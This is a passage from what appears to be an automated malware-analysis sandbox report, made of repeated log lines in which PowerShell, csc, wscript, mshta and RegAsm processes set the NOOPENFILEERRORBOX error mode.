                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
